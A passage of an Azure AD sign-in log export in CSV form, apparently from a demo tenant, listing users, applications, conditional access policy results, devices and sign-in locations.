MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",89223cb6-60af-4a3e-b2e1-947006630700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,low,atRisk,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,89223cb6-60af-4a3e-b2e1-947006630700,SigninLogs,Sucess,28,3
+1717,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ca106d5-48bd-4b70-871b-9c73d341b398,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",98dc8e9a-f4c7-40e8-8c8c-df6518a51b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,98dc8e9a-f4c7-40e8-8c8c-df6518a51b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1718,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e2144db-695a-4225-b156-08097d57b5f0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e9069a8f-c043-4e23-9435-a556ab640100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9069a8f-c043-4e23-9435-a556ab640100,SigninLogs,Sucess,36.6404686,-78.26995087
+1719,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:30.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:55,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",e960b628-b270-4a02-8866-d5e9fd9c0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.16507720947266, 'latitude': 47.061771392822266}, 'state': 'Washington', 'city': 'Orting'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e960b628-b270-4a02-8866-d5e9fd9c0200,SigninLogs,Sucess,47.06177139,-122.1650772
+1720,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:40.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:03,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",e9c15e3c-0237-406d-a880-6953a7aa5000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e9c15e3c-0237-406d-a880-6953a7aa5000,SigninLogs,Sucess,35.01296997,-80.93171692
+1721,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f77775c-2865-47a6-afc9-17aa99b9b62c,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",52a6664f-09a1-41b6-959f-775db35f1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,52a6664f-09a1-41b6-959f-775db35f1600,SigninLogs,Sucess,41.90428925,-85.99833679
+1722,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a380d6a5-cf50-4273-b5ef-8d3cae1c748e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",86807d56-c656-4319-9bdc-577e04c61600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,86807d56-c656-4319-9bdc-577e04c61600,SigninLogs,Sucess,36.6404686,-78.26995087
+1723,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:22,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",fd7d50db-5207-4a08-83a9-795881934700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fd7d50db-5207-4a08-83a9-795881934700,SigninLogs,Sucess,40.75891113,-73.97901917
+1724,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3d2d517c-f01a-48d7-9297-32a0e589da73,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 